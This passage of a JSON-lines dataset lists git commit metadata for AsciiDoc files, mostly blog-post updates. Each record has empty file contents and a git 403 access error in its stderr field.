2015-02-11-.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2015-02-11-.adoc","new_file":"_posts\/2015-02-11-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26fd48219de898ec2f77eb68b174595f758f911b","subject":"Update 2015-08-26-BattleBots-is-Back.adoc","message":"Update 2015-08-26-BattleBots-is-Back.adoc","repos":"MattBlog\/mattblog.github.io,MattBlog\/mattblog.github.io,MattBlog\/mattblog.github.io","old_file":"_posts\/2015-08-26-BattleBots-is-Back.adoc","new_file":"_posts\/2015-08-26-BattleBots-is-Back.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MattBlog\/mattblog.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11cbadaa4f5aa30c5052bdb60598f8cd768c0dc8","subject":"Update 2015-11-23-Deceived-by-Charms.adoc","message":"Update 2015-11-23-Deceived-by-Charms.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-11-23-Deceived-by-Charms.adoc","new_file":"_posts\/2015-11-23-Deceived-by-Charms.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce06f116282503109829e220535f2b5df9fb3ace","subject":"Update 2016-08-29-Moving-from-Spain-to-the-Netherlands.adoc","message":"Update 2016-08-29-Moving-from-Spain-to-the-Netherlands.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-08-29-Moving-from-Spain-to-the-Netherlands.adoc","new_file":"_posts\/2016-08-29-Moving-from-Spain-to-the-Netherlands.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8ecb6e3d844864de7ef781163a5fa503dbedba2","subject":"y2b create post The Wireless Future They Promised Us...","message":"y2b create post The Wireless Future They Promised Us...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-05-The-Wireless-Future-They-Promised-Us.adoc","new_file":"_posts\/2016-08-05-The-Wireless-Future-They-Promised-Us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"595af7cdfb6b5e3c2d8adcd74ffb97032bae4ff3","subject":"docs: add 1.5.0 release note for thread count reduction","message":"docs: add 1.5.0 release note for thread count reduction\n\nChange-Id: I06939f0e01db780f86a7da16e92e5acd188b6925\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/7905\nReviewed-by: Jean-Daniel Cryans <4bf4c125525b8623ac45dfd7774cbf531df19085@apache.org>\nTested-by: Dan Burkert <4ef91e292a55314d2653d35ff669a6bd939ce515@apache.org>\n","repos":"helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ff25bf8c66fb13f507180eafced6f9dbfacdf1f9","subject":"Initial revision.","message":"Initial revision.\n","repos":"project-chip\/connectedhomeip,nestlabs\/connectedhomeip,nestlabs\/connectedhomeip,project-chip\/connectedhomeip,nestlabs\/connectedhomeip,nestlabs\/connectedhomeip,project-chip\/connectedhomeip,project-chip\/connectedhomeip,nestlabs\/connectedhomeip,project-chip\/connectedhomeip,nestlabs\/connectedhomeip,nestlabs\/connectedhomeip,project-chip\/connectedhomeip","old_file":"docs\/style\/DOXYGEN.adoc","new_file":"docs\/style\/DOXYGEN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/project-chip\/connectedhomeip.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7cb4f5719273cd0592196d99581dce98fcea2fb6","subject":"Create file","message":"Create file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/create-worker\/httpie-request.adoc","new_file":"xill-web-service\/tmp-test\/create-worker\/httpie-request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/XillioQA\/xill-platform-3.4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2e89b404ecbe8e02b853f9ebba310afa37164ed","subject":"new poem","message":"new poem","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/poems\/trust.adoc","new_file":"content\/poems\/trust.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"28ebe9df120ad876e7298e6547de158a4563eff7","subject":"README","message":"README\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Git\/Graded exercices.adoc","new_file":"Git\/Graded exercices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a42249b34d341a92fa250037151b4b35dbbff606","subject":"Update 2016-05-26-Kafka.adoc","message":"Update 2016-05-26-Kafka.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2016-05-26-Kafka.adoc","new_file":"_posts\/2016-05-26-Kafka.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00101372d017aac8918910dee5386e7710bb0f62","subject":"README: The beginnings of a README","message":"README: The beginnings of a README\n","repos":"josh-berry\/homectl,josh-berry\/homectl","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/josh-berry\/homectl.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b4434a89bc89eb1a2b13adfedac41f962ae5d6b","subject":"y2b create post 13\\","message":"y2b create post 13\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-10-28-13.adoc","new_file":"_posts\/2012-10-28-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d5d2364e8ab964eb1da636344a6a96948e888d8","subject":"Update 2017-02-21-30.adoc","message":"Update 2017-02-21-30.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21-30.adoc","new_file":"_posts\/2017-02-21-30.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6e8e22aa99afc5f9dc0b3d59fa5c224d8997dfc","subject":"y2b create post Dyson Air Multiplier Unboxing \\u0026 Overview","message":"y2b create post Dyson Air Multiplier Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-04-25-Dyson-Air-Multiplier-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-04-25-Dyson-Air-Multiplier-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f37650ca447b6441cf7b7aec18ffaba28df2d5e0","subject":"Update 2016-03-26-First-Blog-Post-Using-Ascii-Doc-in-Hub-Press.adoc","message":"Update 2016-03-26-First-Blog-Post-Using-Ascii-Doc-in-Hub-Press.adoc","repos":"chackomathew\/blog,chackomathew\/blog,chackomathew\/blog,chackomathew\/blog","old_file":"_posts\/2016-03-26-First-Blog-Post-Using-Ascii-Doc-in-Hub-Press.adoc","new_file":"_posts\/2016-03-26-First-Blog-Post-Using-Ascii-Doc-in-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chackomathew\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2d5c941ca162b2e62f95edc50d76145d40b95db","subject":"git commands","message":"git commands\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"practical_git.adoc","new_file":"practical_git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"2060a1151d9a426ba1ec079a365f1a771a1c478f","subject":"Update 2017-05-26-Pattern-matching-in-haskell.adoc","message":"Update 2017-05-26-Pattern-matching-in-haskell.adoc","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2017-05-26-Pattern-matching-in-haskell.adoc","new_file":"_posts\/2017-05-26-Pattern-matching-in-haskell.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seturne\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ee22ebc84d18cecbe399174c752b0737cadc109","subject":"Add beginning of instructions","message":"Add beginning of instructions\n","repos":"judcon\/mobile_and_push","old_file":"INSTRUCTIONS.asciidoc","new_file":"INSTRUCTIONS.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/judcon\/mobile_and_push.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9d8c9d56746de63b9a7610d7e4095e07e825ff6f","subject":"Update 2016-12-30-Kleptography-in-RSA.adoc","message":"Update 2016-12-30-Kleptography-in-RSA.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eef5f7773f36a8d9d84e6ee7f518d155ed179af2","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c0e49724d519f34cec8d5ac582ee53949e54385","subject":"Update 2016-11-26-Todo.adoc","message":"Update 2016-11-26-Todo.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-26-Todo.adoc","new_file":"_posts\/2016-11-26-Todo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef6411e7c7a586c8f935c2a9dda4e99050a6cadd","subject":"Create BL readme","message":"Create BL readme","repos":"mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh","old_file":"nRF51\/bootloader\/README.adoc","new_file":"nRF51\/bootloader\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrquincle\/nRF51-ble-bcast-mesh.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"ba6ad1eff3211655dda571682cc5b298c8d18f29","subject":"y2b create post Samsung Galaxy S4 Unboxing (Galaxy S IV)","message":"y2b create post Samsung Galaxy S4 Unboxing (Galaxy S IV)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-02-Samsung-Galaxy-S4-Unboxing-Galaxy-S-IV.adoc","new_file":"_posts\/2013-05-02-Samsung-Galaxy-S4-Unboxing-Galaxy-S-IV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41e8f2ac7a9b805215bf626e106c99c1f3136dee","subject":"Update 2016-09-08-Rhizosphere-metatranscriptome-analysis.adoc","message":"Update 2016-09-08-Rhizosphere-metatranscriptome-analysis.adoc","repos":"jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io","old_file":"_posts\/2016-09-08-Rhizosphere-metatranscriptome-analysis.adoc","new_file":"_posts\/2016-09-08-Rhizosphere-metatranscriptome-analysis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jonathandmoore\/jonathandmoore.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"197e8b43b19c80730030b3ed41b79bb0f51c22a5","subject":"y2b create post Designing My Own iPhone 8 From Scratch!","message":"y2b create post Designing My Own iPhone 8 From Scratch!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-30-Designing-My-Own-iPhone-8-From-Scratch.adoc","new_file":"_posts\/2017-07-30-Designing-My-Own-iPhone-8-From-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6560bb7dcaf30331690a2941f3051e032fe0bcd9","subject":"Document the new forceLocal property on BrowserStackExtension.","message":"Document the new forceLocal property on BrowserStackExtension.\n\nFixes geb\/issues#385\n","repos":"pierre-hilt\/geb,menonvarun\/geb,menonvarun\/geb,madmas\/geb,onBass-naga\/geb,madmas\/geb,menonvarun\/geb,onBass-naga\/geb,pierre-hilt\/geb,ntotomanov-taulia\/geb,geb\/geb,pierre-hilt\/geb,geb\/geb,madmas\/geb,ntotomanov-taulia\/geb","old_file":"doc\/manual\/src\/docs\/asciidoc\/111-cloud-browsers.adoc","new_file":"doc\/manual\/src\/docs\/asciidoc\/111-cloud-browsers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madmas\/geb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"af030e6221b1c3936f8f30d9fa97c474dd918aea","subject":"Update 2015-09-08-Courseras-Data-Science-Specialization.adoc","message":"Update 2015-09-08-Courseras-Data-Science-Specialization.adoc","repos":"sumit1sen\/sumit1sen.github.io,sumit1sen\/sumit1sen.github.io,sumit1sen\/sumit1sen.github.io","old_file":"_posts\/2015-09-08-Courseras-Data-Science-Specialization.adoc","new_file":"_posts\/2015-09-08-Courseras-Data-Science-Specialization.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sumit1sen\/sumit1sen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"179ca19aee5d169c5c1c336be38e6def511686ef","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"099a2dedc8a9348ac82b0008b77c006bcb95f3ec","subject":"Create 220.adoc","message":"Create 220.adoc","repos":"camunda\/camunda-spring-boot-starter,camunda\/camunda-bpm-spring-boot-starter,camunda\/camunda-spring-boot-starter","old_file":"docs\/src\/main\/asciidoc\/changelog\/220.adoc","new_file":"docs\/src\/main\/asciidoc\/changelog\/220.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camunda\/camunda-spring-boot-starter.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2a1b763a2e2007937dba0c5851a3cbf3abd67146","subject":"Update 2016-10-03-lid-close-enlightenment-020-fedora.adoc","message":"Update 2016-10-03-lid-close-enlightenment-020-fedora.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-10-03-lid-close-enlightenment-020-fedora.adoc","new_file":"_posts\/2016-10-03-lid-close-enlightenment-020-fedora.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1211b0531b4f95a9b5aeb8808e27f1d6032fe09","subject":"Custom URL parser blog","message":"Custom URL parser blog\n","repos":"apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io","old_file":"_blog-src\/_posts\/2018-07-03-custom-url-parser.adoc","new_file":"_blog-src\/_posts\/2018-07-03-custom-url-parser.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apiman\/apiman.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7f4302466eb0df6538ae0fce6696067588ab9ab5","subject":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","message":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c207c9cf0aa3a6f5708df68c9d68846f3bf3111","subject":"Update 2016-04-25-Eat-free-at-Disney-World-in-2016.adoc","message":"Update 2016-04-25-Eat-free-at-Disney-World-in-2016.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-04-25-Eat-free-at-Disney-World-in-2016.adoc","new_file":"_posts\/2016-04-25-Eat-free-at-Disney-World-in-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c749110794be66b8dc3c5cad7e731778fcefa6a2","subject":"Update 2017-12-18-P-H-Per-Golang.adoc","message":"Update 2017-12-18-P-H-Per-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-18-P-H-Per-Golang.adoc","new_file":"_posts\/2017-12-18-P-H-Per-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d48513d524d445d777cd668398de3f5e7c8a4b6","subject":"Update 2017-01-31-Episode-86-From-Meatballs-to-Mods.adoc","message":"Update 2017-01-31-Episode-86-From-Meatballs-to-Mods.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-01-31-Episode-86-From-Meatballs-to-Mods.adoc","new_file":"_posts\/2017-01-31-Episode-86-From-Meatballs-to-Mods.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48c40ac5f74c384989f2080e998076acff0a40b6","subject":"Update 2018-08-12-Prepare-for-Mobile-First-Index.adoc","message":"Update 2018-08-12-Prepare-for-Mobile-First-Index.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-12-Prepare-for-Mobile-First-Index.adoc","new_file":"_posts\/2018-08-12-Prepare-for-Mobile-First-Index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7590f09560ba53b3b56b75628b8da7800ed15aa7","subject":"Update 2015-02-09-First-Post.adoc","message":"Update 2015-02-09-First-Post.adoc","repos":"hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io","old_file":"_posts\/2015-02-09-First-Post.adoc","new_file":"_posts\/2015-02-09-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hhimanshu\/hhimanshu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b94325a55711a776ef0e59bbd358f59595031a6","subject":"Update 2016-12-23-First-post.adoc","message":"Update 2016-12-23-First-post.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2016-12-23-First-post.adoc","new_file":"_posts\/2016-12-23-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14a9569067cb1ce1d08555e773aded453b81cba0","subject":"Update 2016-6-26-PHRER-array-merge.adoc","message":"Update 2016-6-26-PHRER-array-merge.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-PHRER-array-merge.adoc","new_file":"_posts\/2016-6-26-PHRER-array-merge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3bcaefcf7cf31832e184ebe5592cc432f2c6cf25","subject":"Update 2016-10-07-wsdl-xsd.adoc","message":"Update 2016-10-07-wsdl-xsd.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-10-07-wsdl-xsd.adoc","new_file":"_posts\/2016-10-07-wsdl-xsd.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eed6c20371e1eeb34eda89b5ddbccd672a6a0e4d","subject":"Update 2017-03-17-Poetry-3.adoc","message":"Update 2017-03-17-Poetry-3.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-03-17-Poetry-3.adoc","new_file":"_posts\/2017-03-17-Poetry-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b329aa636f4e7a63e293819e76ba141f0b6f3122","subject":"Peer Review","message":"Peer Review\n","repos":"serenity-devstack\/spring-cloud-services-connector","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/serenity-devstack\/spring-cloud-services-connector.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c20141cc7cebddb586b40a48d05c6a06b5ad6ac0","subject":"Publish 2015-2-1-A-Man-Without-a-Country.adoc","message":"Publish 2015-2-1-A-Man-Without-a-Country.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"2015-2-1-A-Man-Without-a-Country.adoc","new_file":"2015-2-1-A-Man-Without-a-Country.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30022fdbaf321e34f21dff275012123f799ce6a4","subject":"relation between ports, vSwitch limitation note","message":"relation between ports, vSwitch limitation note\n","repos":"dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8d0b270997c41463b9a0d553cf0af81f5b078ae2","subject":"Update 2015-09-20-Flask-learning.adoc","message":"Update 2015-09-20-Flask-learning.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Flask-learning.adoc","new_file":"_posts\/2015-09-20-Flask-learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 